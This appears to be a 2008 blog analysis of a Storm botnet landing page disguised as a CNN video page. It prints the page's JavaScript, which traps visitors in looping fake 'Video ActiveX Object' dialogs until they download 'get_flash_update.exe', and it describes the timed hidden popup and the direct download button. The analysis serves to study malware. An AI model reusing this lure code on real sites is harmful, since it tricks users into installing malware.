Storm botnet landing page - Faux-CNN splash screen

The Storm botnet spammed this page starting on 2008-08-05, and I currently show 103 different hijacked servers serving it. It's an emulation of a CNN video page, which makes sense given that the spam pointing to it is entitled "CNN.com Top 10" and is made to look like a CNN update.

It uses a number of different techniques to attempt to run the file "get_flash_update.exe" on the user's machine, but makes no particular attempt to conceal its actions, which is disappointing if, like me, you're a fan of JavaScript trickiness.

It was succeeded on August 7 by an obfuscated version.

You can see the whole page here. Here are some of the highlights.

First, the entire point of this page is to load "get_flash_update.exe", either by getting the browser to do so automatically (say, by refreshing the page to that URL), or by fooling the user into clicking something telling the browser to do so.

For instance, there's this little Javascript beauty:

function vc() {
   if (confirm('Video ActiveX Object Error.\n\n
               Your browser cannot play this video file.\n
               Click \'OK\' to download and install missing
               Video ActiveX Object.')) {
      location.href="get_flash_update.exe";
   } else {
      if (alert('Please install new version of Video ActiveX Object.')) {
         vc();
      } else {
         vc();
      }			
   }
}

When called, this function pops up a box telling you that you can't play this fascinating CNN news video without updating something. The vast majority of users will simply say, "OK," and click. If they do, the "location.href" is changed to load "get_flash_update.exe". But if they feel suspicious and don't, another popup box appears, asking them flat-out to install the change. No matter what they click on that, they're taken back to the start.

Once this function is called, the only way to break out of the loop is to click "OK", or kill the browser with Task Manager or by turning off the machine. Javascript can be kind of insistent that way.

And this function is called all over the place, because it's the main feature of the Close() function, which is the onClick function for things on the popdiv popup window emulator, installed on a timeout for the whole page, and called by the Down() function if the user just hits the escape key on the popup.

But if that function somehow manages to avoid getting called (perhaps Javascript is simply disabled?), the page still links get_flash_update.exe directly from a button-like image. We're all quite well trained to click play button images on Youtube, so again: most users will simply click that button without even pausing.

Oh, I mentioned a popup window. This is kind of cool; I don't really do a lot of Javascript programming, but it's this kind of thing that makes me consider doing more of it. The "popdiv" div is originally hidden when the page loads. A timer is set to display it after 2 seconds, and everything on it calls vc(). Devious!

The popup window itself can be dragged around the screen, with the Drag object. The source for that can be found here (yes, they're using it without attribution), dating to 2001. I find it fascinating how well the lineage of these blocks can be traced.

Which brings me to this, speaking of lineage:

function activex_is_here()
{
    try
    {
        return false;
    }
    catch(e)
    {
        ;
    }

    return false;
}

Isn't that odd? It does precisely nothing, always returning false. That's because it's a fossil -- it's a disabled version of a working function used last week. Googling "function activex_is_here()" gets some interesting results, which I discuss here.

Incidentally, the same Google session netted me a nice analysis of this page dated in April of this year, well before the Storm spam storm starting in June. Interesting. I can't understand the analysis very well, because my Polish is really weak, but the code is quite similar.